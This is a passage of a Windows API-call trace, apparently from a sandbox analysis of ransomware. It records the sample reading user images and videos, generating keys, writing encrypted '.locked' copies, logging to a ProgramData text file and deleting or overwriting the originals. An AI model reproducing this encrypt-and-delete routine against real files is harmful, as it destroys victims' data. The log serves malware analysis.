lpReserved=0x0 | out: lpBuffer=0x1234c240*, lpNumberOfCharsWritten=0x1705ba24*=0xc) returned 1 [0314.383] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.420] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\QRa-hJxxUp2Ecy98M.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\qra-hjxxup2ecy98m.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0314.420] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1705bd9c | out: lpMode=0x1705bd9c) returned 0 [0314.420] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\QRa-hJxxUp2Ecy98M.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\qra-hjxxup2ecy98m.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0314.533] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.541] SetEvent (hEvent=0x150) returned 1 [0314.541] SetEvent (hEvent=0x1b8) returned 1 [0314.541] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1705bd9c | out: lpMode=0x1705bd9c) returned 0 [0314.542] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.610] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0314.610] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0314.610] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0314.610] WriteFile (in: hFile=0x208, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1705bd78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x1705bd78*=0x80, lpOverlapped=0x0) returned 1 [0314.613] ReadFile (in: hFile=0x1a4, lpBuffer=0x1705c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1705bd68, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesRead=0x1705bd68*=0x16ede, lpOverlapped=0x0) returned 1 [0314.616] WriteFile (in: hFile=0x208, lpBuffer=0x1705c000*, nNumberOfBytesToWrite=0x16ede, lpNumberOfBytesWritten=0x1705bd74, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesWritten=0x1705bd74*=0x16ede, lpOverlapped=0x0) returned 1 [0314.676] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.687] ReadFile (in: hFile=0x1a4, lpBuffer=0x1705c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1705bd68, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesRead=0x1705bd68*=0x0, lpOverlapped=0x0) returned 1 [0314.688] CloseHandle (hObject=0x208) returned 1 [0314.688] CloseHandle (hObject=0x1a4) returned 1 [0314.688] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0314.689] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1705be94 | out: lpMode=0x1705be94) returned 0 [0314.689] WriteFile (in: hFile=0x1a4, lpBuffer=0x126ee150*, nNumberOfBytesToWrite=0x67, lpNumberOfBytesWritten=0x1705be64, lpOverlapped=0x0 | out: lpBuffer=0x126ee150*, lpNumberOfBytesWritten=0x1705be64*=0x67, lpOverlapped=0x0) returned 1 [0314.689] CloseHandle (hObject=0x1a4) returned 1 [0314.689] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\QRa-hJxxUp2Ecy98M.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\qra-hjxxup2ecy98m.gif")) returned 1 [0314.774] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.826] SetEvent (hEvent=0x1dc) returned 1 [0314.826] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.828] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.830] SetEvent (hEvent=0x1f0) returned 1 [0314.830] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0314.914] SetEvent (hEvent=0x1e8) returned 1 [0314.914] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e100*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x17059a24, lpReserved=0x0 | out: lpBuffer=0x1263e100*, lpNumberOfCharsWritten=0x17059a24*=0xc) returned 1 [0314.942] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.079] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\znhvxq7a7nR.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\znhvxq7a7nr.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0315.079] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x17059d9c | out: lpMode=0x17059d9c) returned 0 [0315.079] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\znhvxq7a7nR.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\znhvxq7a7nr.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0315.088] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x17059d9c | out: lpMode=0x17059d9c) returned 0 [0315.088] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0315.088] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e040 | out: pbBuffer=0x1234e040) returned 1 [0315.088] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0315.088] WriteFile (in: hFile=0x218, lpBuffer=0x12ba1000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x17059d78, lpOverlapped=0x0 | out: lpBuffer=0x12ba1000*, lpNumberOfBytesWritten=0x17059d78*=0x80, lpOverlapped=0x0) returned 1 [0315.091] ReadFile (in: hFile=0x200, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x17059d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x17059d68*=0xaa1, lpOverlapped=0x0) returned 1 [0315.092] WriteFile (in: hFile=0x218, lpBuffer=0x12ba1000*, nNumberOfBytesToWrite=0xaa1, lpNumberOfBytesWritten=0x17059d78, lpOverlapped=0x0 | out: lpBuffer=0x12ba1000*, lpNumberOfBytesWritten=0x17059d78*=0xaa1, lpOverlapped=0x0) returned 1 [0315.095] ReadFile (in: hFile=0x200, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x17059d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x17059d68*=0x0, lpOverlapped=0x0) returned 1 [0315.095] CloseHandle (hObject=0x218) returned 1 [0315.138] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.347] SetEvent (hEvent=0x150) returned 1 [0315.347] SetEvent (hEvent=0x14c) returned 1 [0315.347] CloseHandle (hObject=0x200) returned 1 [0315.347] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.479] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0315.480] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x17059e94 | out: lpMode=0x17059e94) returned 0 [0315.480] WriteFile (in: hFile=0x1c8, lpBuffer=0x125ee120*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x17059e64, lpOverlapped=0x0 | out: lpBuffer=0x125ee120*, lpNumberOfBytesWritten=0x17059e64*=0x57, lpOverlapped=0x0) returned 1 [0315.480] CloseHandle (hObject=0x1c8) returned 1 [0315.480] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\znhvxq7a7nR.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\znhvxq7a7nr.gif")) returned 1 [0315.573] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0315.577] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0315.577] SetEvent (hEvent=0x150) returned 1 [0315.577] SetEvent (hEvent=0x1f0) returned 1 [0315.577] SetEvent (hEvent=0x1dc) returned 1 [0315.577] SetEvent (hEvent=0x1b8) returned 1 [0315.590] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\znhvxq7a7nR.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\znhvxq7a7nr.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0315.598] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.601] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x17059e88 | out: lpMode=0x17059e88) returned 0 [0315.601] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.615] SetEvent (hEvent=0x1e8) returned 1 [0315.615] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.621] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1265ba24*=0xc) returned 1 [0315.675] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\ldvBDUlb8N1DKZb.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\ldvbdulb8n1dkzb.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0315.676] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0315.676] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\ldvBDUlb8N1DKZb.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\ldvbdulb8n1dkzb.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0315.676] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0315.676] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0315.676] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e0e0 | out: pbBuffer=0x1234e0e0) returned 1 [0315.676] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340401 | out: pbBuffer=0x12340401) returned 1 [0315.677] WriteFile (in: hFile=0x230, lpBuffer=0x12668000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x12668000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0315.678] SetEvent (hEvent=0x1e8) returned 1 [0315.678] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.685] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.690] SetEvent (hEvent=0x220) returned 1 [0315.691] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0315.693] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.693] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0315.693] SetEvent (hEvent=0x150) returned 1 [0315.693] SetEvent (hEvent=0x190) returned 1 [0315.693] SetEvent (hEvent=0x220) returned 1 [0315.693] SetEvent (hEvent=0x14c) returned 1 [0315.719] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0315.725] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.725] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0315.726] SetEvent (hEvent=0x220) returned 1 [0315.726] SetEvent (hEvent=0x20c) returned 1 [0315.726] SetEvent (hEvent=0x1b8) returned 1 [0315.726] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.727] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0315.727] SetEvent (hEvent=0x20c) returned 1 [0315.727] SetEvent (hEvent=0x1b8) returned 1 [0315.727] SetEvent (hEvent=0x220) returned 1 [0315.727] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\fz05L0c.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\fz05l0c.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0315.731] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125dce88 | out: lpMode=0x125dce88) returned 0 [0315.731] WriteFile (in: hFile=0x1e0, lpBuffer=0x12992000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dce78, lpOverlapped=0x0 | out: lpBuffer=0x12992000*, lpNumberOfBytesWritten=0x125dce78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.759] CloseHandle (hObject=0x1e0) returned 1 [0315.761] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\fz05L0c.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\fz05l0c.gif")) returned 1 [0315.874] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0315.941] SetEvent (hEvent=0x1f0) returned 1 [0315.941] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.035] SetEvent (hEvent=0x20c) returned 1 [0316.035] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.064] SetEvent (hEvent=0x1dc) returned 1 [0316.064] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.125] SetEvent (hEvent=0x1f0) returned 1 [0316.125] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.163] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0316.228] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\jLkeKBBsG2Mfojro.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jlkekbbsg2mfojro.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0316.229] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0316.229] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\jLkeKBBsG2Mfojro.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jlkekbbsg2mfojro.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0316.229] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0316.229] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c240 | out: pbBuffer=0x1234c240) returned 1 [0316.229] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e0d0 | out: pbBuffer=0x1234e0d0) returned 1 [0316.229] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340801 | out: pbBuffer=0x12340801) returned 1 [0316.230] WriteFile (in: hFile=0x230, lpBuffer=0x15fa2000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x15fa2000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0316.232] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0316.256] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.256] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0316.256] SetEvent (hEvent=0x150) returned 1 [0316.256] SetEvent (hEvent=0x190) returned 1 [0316.256] SetEvent (hEvent=0x184) returned 1 [0316.256] SetEvent (hEvent=0x1b8) returned 1 [0316.256] ReadFile (in: hFile=0x1c8, lpBuffer=0x15fa4000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x15fa4000*, lpNumberOfBytesRead=0x125e3d68*=0xde6d, lpOverlapped=0x0) returned 1 [0316.317] WriteFile (in: hFile=0x230, lpBuffer=0x15fa4000*, nNumberOfBytesToWrite=0xde6d, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x15fa4000*, lpNumberOfBytesWritten=0x125e3d74*=0xde6d, lpOverlapped=0x0) returned 1 [0316.338] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.505] ReadFile (in: hFile=0x1c8, lpBuffer=0x15fa4000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x15fa4000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0316.505] CloseHandle (hObject=0x230) returned 1 [0316.506] CloseHandle (hObject=0x1c8) returned 1 [0316.506] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0316.506] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0316.506] WriteFile (in: hFile=0x1c8, lpBuffer=0x12380180*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x12380180*, lpNumberOfBytesWritten=0x125e3e64*=0x39, lpOverlapped=0x0) returned 1 [0316.507] CloseHandle (hObject=0x1c8) returned 1 [0316.507] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\jLkeKBBsG2Mfojro.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jlkekbbsg2mfojro.bmp")) returned 1 [0316.562] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.621] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.630] SetEvent (hEvent=0x12c) returned 1 [0316.631] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0316.631] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0316.631] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0316.631] WriteFile (in: hFile=0x1a4, lpBuffer=0x126de000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x126de000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0316.633] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc0e0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1248ba24, lpReserved=0x0 | out: lpBuffer=0x125fc0e0*, lpNumberOfCharsWritten=0x1248ba24*=0xc) returned 1 [0316.636] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.693] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\K9Xv6MgrumKej.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\k9xv6mgrumkej.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0316.693] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1248bd9c | out: lpMode=0x1248bd9c) returned 0 [0316.693] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\K9Xv6MgrumKej.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\k9xv6mgrumkej.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0316.894] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1248bd9c | out: lpMode=0x1248bd9c) returned 0 [0316.894] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0316.894] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e060 | out: pbBuffer=0x1234e060) returned 1 [0316.894] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0316.895] WriteFile (in: hFile=0x224, lpBuffer=0x12749000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1248bd78, lpOverlapped=0x0 | out: lpBuffer=0x12749000*, lpNumberOfBytesWritten=0x1248bd78*=0x80, lpOverlapped=0x0) returned 1 [0316.897] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0316.915] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0316.915] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0316.915] SetEvent (hEvent=0x214) returned 1 [0316.915] SetEvent (hEvent=0x220) returned 1 [0316.915] SetEvent (hEvent=0x1e8) returned 1 [0316.915] ReadFile (in: hFile=0x218, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1248bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1248bd68*=0xe47d, lpOverlapped=0x0) returned 1 [0316.918] WriteFile (in: hFile=0x224, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0xe47d, lpNumberOfBytesWritten=0x1248bd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1248bd74*=0xe47d, lpOverlapped=0x0) returned 1 [0317.006] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.057] ReadFile (in: hFile=0x218, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1248bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1248bd68*=0x0, lpOverlapped=0x0) returned 1 [0317.057] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0317.189] CloseHandle (hObject=0x224) returned 1 [0317.189] CloseHandle (hObject=0x218) returned 1 [0317.189] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0317.190] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1248be94 | out: lpMode=0x1248be94) returned 0 [0317.190] WriteFile (in: hFile=0x218, lpBuffer=0x12380180*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1248be64, lpOverlapped=0x0 | out: lpBuffer=0x12380180*, lpNumberOfBytesWritten=0x1248be64*=0x34, lpOverlapped=0x0) returned 1 [0317.190] CloseHandle (hObject=0x218) returned 1 [0317.190] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\K9Xv6MgrumKej.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\k9xv6mgrumkej.avi")) returned 1 [0317.381] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\K9Xv6MgrumKej.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\k9xv6mgrumkej.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0317.544] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 